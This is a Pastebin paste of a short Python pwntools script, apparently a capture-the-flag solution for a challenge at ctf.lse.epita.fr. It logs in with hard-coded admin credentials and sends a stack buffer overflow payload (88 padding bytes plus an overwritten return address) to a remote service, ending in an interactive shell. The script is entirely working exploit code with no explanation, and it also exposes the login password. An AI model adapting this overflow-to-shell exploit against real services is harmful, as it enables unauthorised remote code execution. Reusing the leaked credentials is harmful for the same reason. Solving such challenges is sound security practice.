Advertisement
Guest User

Untitled

a guest
Mar 14th, 2017
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. #Author : Faid Amine
  4.  
  5. from pwn import *
  6.  
  7. #LSE{e4xxxxxxxxxxx}
  8.  
  9. #Login Info
  10. user = "admin"
  11. passw = "T6OBSh2i"
  12.  
  13. s = remote('ctf.lse.epita.fr',52190)
  14.  
  15. command = "/bin/sh"
  16. off = 88
  17.  
  18. #### PAYLOAD
  19.  
  20. payload = "A"*off
  21. payload += p64(0x40084a)
  22.  
  23. ## Connect
  24.  
  25. s.recvuntil("username: ")
  26. s.sendline(user)
  27.  
  28. s.recvuntil("password: ")
  29. s.sendline(passw)
  30.  
  31. s.recvuntil("choice: ")
  32. s.sendline("1")
  33.  
  34. ### Send Command /bin/sh
  35.  
  36. s.recvuntil("Command: ")
  37. s.sendline(command)
  38.  
  39. ### Send Payload
  40.  
  41. s.recvuntil("choice: ")
  42. s.sendline(payload)
  43.  
  44. ### Exit
  45. s.recvuntil("choice: ")
  46. s.sendline("3")
  47.  
  48.  
  49. s.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement